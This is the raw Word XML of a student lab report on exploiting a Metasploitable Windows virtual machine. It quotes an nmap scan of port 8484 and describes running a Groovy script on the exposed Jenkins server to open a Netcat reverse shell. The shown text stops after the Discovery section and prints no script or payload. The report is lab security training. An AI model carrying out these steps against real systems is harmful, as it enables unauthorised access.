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40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30"/>
        <w:gridCol w:w="7830"/>
        <w:gridCol w:w="810"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA059E" w:rsidRPr="004F49D8" w14:paraId="55290B9B" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="1977"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="053E7DEC" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="004218DE">
            <w:pPr>
              <w:spacing w:before="110"/>
              <w:jc w:val="right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r w:rsidRPr="004F49D8"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5104" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="0" wp14:anchorId="35D3AA98" wp14:editId="144460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1839600" cy="1144800"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:wrapNone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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="497177BD" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="007246A9"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="210B5F8F" w14:textId="6C0AE84C" w:rsidR="00AA059E" w:rsidRPr="00CD4C3A" w:rsidRDefault="00CD4C3A" w:rsidP="007246A9">
            <w:pPr>
              <w:pStyle w:val="Title"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD4C3A">
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>Vulnerability Scann</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>ing 2 of</w:t>
            </w:r>
            <w:r w:rsidR="002478BA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2 (core)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5DB8E1" w14:textId="28AB008C" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00CD4C3A" w:rsidP="007246A9">
            <w:pPr>
              <w:pStyle w:val="CoverInfo"/>
              <w:rPr>
                <w:b/>
                <w:spacing w:val="80"/>
                <w:sz w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Otis Smith</w:t>
            </w:r>
            <w:r w:rsidR="007246A9">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1878201221"/>
                <w:placeholder>
                  <w:docPart w:val="B1EAAF5C8A0142D298EF8C451CB26F11"/>
                </w:placeholder>
                <w:temporary/>
                <w:showingPlcHdr/>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="007246A9" w:rsidRPr="004F49D8">
                  <w:t>/</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidR="007246A9">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:t>Cybersecurity Professional</w:t>
            </w:r>
            <w:r w:rsidR="007246A9">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="1932164169"/>
                <w:placeholder>
                  <w:docPart w:val="4F9296769E1C42BEA3917A36BF199242"/>
                </w:placeholder>
                <w:temporary/>
                <w:showingPlcHdr/>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="007246A9" w:rsidRPr="004F49D8">
                  <w:t>/</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidR="00AA059E" w:rsidRPr="004F49D8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007246A9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>10.2/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="810" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="428A77F7" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="007246A9"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w:rsidRPr="004F49D8" w14:paraId="3A93B581" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="718"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22AF2116" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="007246A9">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3395126C" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="007246A9"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78F0935F" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="007246A9"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="810" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4052910F" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="00AA059E" w:rsidP="007246A9"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w:rsidRPr="004F49D8" w14:paraId="52D93777" w14:textId="77777777" w:rsidTr="00A665BC">
        <w:trPr>
          <w:trHeight w:val="10944"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12240" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="4FA6F386" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRPr="004F49D8" w:rsidRDefault="007246A9" w:rsidP="004218DE">
            <w:pPr>
              <w:spacing w:before="110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r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6128" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E260D4C" wp14:editId="34D8DB07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121920</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="7772400" cy="7488936"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="4" name="Picture 4" descr="Pipette dropping liquid in a petri d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ipette dropping liquid in a petri dish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2400" cy="7488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231BD9F" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="00234F18"/>
    <w:p w14:paraId="79448474" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="00234F18">
      <w:pPr>
        <w:sectPr w:rsidR="00AA059E" w:rsidSect="006905C4">
          <w:footerReference w:type="default" r:id="rId12"/>
          <w:type w:val="continuous"/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W w:w="12245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642"/>
        <w:gridCol w:w="6486"/>
        <w:gridCol w:w="797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA059E" w14:paraId="7A4C9057" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="1800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549A548B" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FAA42D2" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7283" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="01D24277" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"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83840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E575AC7" wp14:editId="7842902E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8890</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4863600" cy="114480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A059E" w14:paraId="02B7F200" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="4858"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="664A53E4" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C812D2A" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12AE8E36" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00000000" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-1884014575"/>
                <w:placeholder>
                  <w:docPart w:val="DA0F5CB3272F444F8012601533398FBC"/>
                </w:placeholder>
                <w:temporary/>
                <w:showingPlcHdr/>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="008D5E3D" w:rsidRPr="006C3507">
                  <w:t>TABLE OF CONTENTS</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D925AF3" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="7986D298" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="6928"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65CB95AE" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E3A3072" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6486" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="306756EE" w14:textId="6D9F7878" w:rsidR="009A38E6" w:rsidRDefault="00CD4C3A" w:rsidP="00CD4C3A">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
            <w:r>
              <w:t>Summary ………………………</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>…..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="480C1463" w14:textId="19DD80C4" w:rsidR="00CD4C3A" w:rsidRDefault="00CD4C3A" w:rsidP="00CD4C3A">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
            <w:r>
              <w:t>Discovery……………………………</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1067B8B3" w14:textId="61A1ABB4" w:rsidR="00CD4C3A" w:rsidRDefault="00CD4C3A" w:rsidP="00CD4C3A">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability……………………….</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406B2DF1" w14:textId="124503B1" w:rsidR="00CD4C3A" w:rsidRDefault="00CD4C3A" w:rsidP="00CD4C3A">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation……………………</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>…..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="75EA2FF2" w14:textId="7CAB54F8" w:rsidR="00CD4C3A" w:rsidRDefault="006B3CF5" w:rsidP="00CD4C3A">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
            <w:r>
              <w:t>References.</w:t>
            </w:r>
            <w:r w:rsidR="00CD4C3A">
              <w:t>……………………</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00CD4C3A">
              <w:t>…..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2827247A" w14:textId="77777777" w:rsidR="00CD4C3A" w:rsidRDefault="00CD4C3A" w:rsidP="00CD4C3A">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="077EBF62" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="009A38E6" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="TableOfContent"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="797" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2480BAB1" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4449F732" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="00234F18">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-AU" w:eastAsia="en-AU"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CA239B6" wp14:editId="668CBE7A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-454660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-9368790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2761488" cy="10085832"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7" name="Picture 7" descr="Beakers on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eakers on a tabl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1488" cy="1008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D1B3E" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="00234F18">
      <w:pPr>
        <w:sectPr w:rsidR="00AA059E" w:rsidSect="006905C4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24B4D900" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="1799"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A2B10CE" w14:textId="3222FEF3" w:rsidR="00AA059E" w:rsidRPr="00BE5602" w:rsidRDefault="00CD4C3A" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2894" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6130B5A1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87936" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="40743379" wp14:editId="44E78B0A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08" name="Picture 90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 90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5CD1F4D8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48F5A3F9" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
          <w:p w14:paraId="12A07288" w14:textId="7CEDAB29" w:rsidR="00AA059E" w:rsidRDefault="00544402" w:rsidP="00D2733B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r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In this lab, we conducted a vulnerability scanning exercise with the objective of exploiting a machine using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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. We focused on targeting the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> Windows machine</w:t>
            </w:r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 and successfully gained a reverse shell on the system. Our approach involved enumerating port </w:t>
            </w:r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8484</w:t>
            </w:r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, discovering that it was running a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Jenkins server</w:t>
            </w:r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, and using a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Groovy script</w:t>
            </w:r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 from an online source to execute a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reverse shell</w:t>
            </w:r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 on the machine. We utilized </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 to establish a connection to the reverse shell, gaining access to the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victim machine</w:t>
            </w:r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 xml:space="preserve"> and performing basic commands such as "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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dir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>," "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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>," and "</w:t>
            </w:r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help.</w:t>
            </w:r>
            <w:r w:rsidRPr="00745214">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3056948A" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
          <w:p w14:paraId="6B0CC873" w14:textId="77777777" w:rsidR="00544402" w:rsidRDefault="00544402" w:rsidP="004218DE"/>
          <w:p w14:paraId="2A75B5EC" w14:textId="77777777" w:rsidR="00544402" w:rsidRDefault="00544402" w:rsidP="004218DE"/>
          <w:p w14:paraId="67D4FF80" w14:textId="77777777" w:rsidR="00544402" w:rsidRDefault="00544402" w:rsidP="004218DE"/>
          <w:p w14:paraId="41998124" w14:textId="670A12A6" w:rsidR="00544402" w:rsidRDefault="00605B50" w:rsidP="004218DE">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BDA837" wp14:editId="52244B67">
                  <wp:extent cx="6436995" cy="3541776"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                  <wp:docPr id="388360426" name="Picture 4" descr="A hand holding a glowing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360426" name="Picture 4" descr="A hand holding a glowing city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2018" cy="355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690B9" w14:textId="0E1E5E36" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="008D5E3D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="406AD09D" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="61E28ADF" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="3959"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="78170D6E" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="007B7474" w:rsidP="007C28B0">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> Discovery </w:t>
            </w:r>
            <w:r w:rsidR="007C28B0"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98176" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="48CF978B" wp14:editId="269E7424">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:posOffset>5467985</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:posOffset>86995</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1839595" cy="1144270"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="25837081" name="Picture 2583708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4E1050" w14:textId="77777777" w:rsidR="00F96C23" w:rsidRPr="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00F96C23"/>
          <w:p w14:paraId="31F0BC9D" w14:textId="77777777" w:rsidR="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00F96C23"/>
          <w:p w14:paraId="5827D63B" w14:textId="77777777" w:rsidR="00F96C23" w:rsidRPr="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00F96C23"/>
          <w:p w14:paraId="1021D9D2" w14:textId="6A211BE8" w:rsidR="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00D2733B">
            <w:pPr>
              <w:spacing w:line="36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F96C23">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The target machine was identified as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F96C23">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F96C23">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Windows machine, with an IP address of </w:t>
            </w:r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10.0.2.9</w:t>
            </w:r>
            <w:r w:rsidRPr="00F96C23">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">.  Port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8484</w:t>
            </w:r>
            <w:r w:rsidRPr="00F96C23">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> was discovered to be open and running a Jenkins server with the version "</w:t>
            </w:r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Jetty winstone-2.8</w:t>
            </w:r>
            <w:r w:rsidRPr="00F96C23">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">." </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>This was the command use “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D109CA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 xml:space="preserve"> -A -T4 10.0.2.9 -p 8484</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">” </w:t>
            </w:r>
            <w:r w:rsidRPr="00765407">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">to find </w:t>
            </w:r>
            <w:r w:rsidR="00D109CA" w:rsidRPr="00765407">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> the </w:t>
            </w:r>
            <w:r w:rsidRPr="00765407">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00765407">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> running on th</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00765407">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E29EFA8" w14:textId="77777777" w:rsidR="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00F96C23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26908151" w14:textId="77777777" w:rsidR="00D2733B" w:rsidRDefault="00D2733B" w:rsidP="00F96C23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0EF4F7B5" w14:textId="66CFA41B" w:rsidR="00F96C23" w:rsidRPr="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00F96C23">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D79958" wp14:editId="45D66ED4">
                  <wp:extent cx="7124101" cy="1981200"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="697497777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497777" name="Picture 1" descr="A screen shot of a computer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873" cy="200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AEC30" w14:textId="709796EC" w:rsidR="00F96C23" w:rsidRPr="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="00F96C23"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08EA46F7" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
          <w:p w14:paraId="2133F8F5" w14:textId="77777777" w:rsidR="00F96C23" w:rsidRDefault="00F96C23" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="764DF6B6" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="154"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4AF66BDF" w14:textId="547B314F" w:rsidR="00AA059E" w:rsidRPr="00945B87" w:rsidRDefault="00AA059E" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="PictureInfo"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
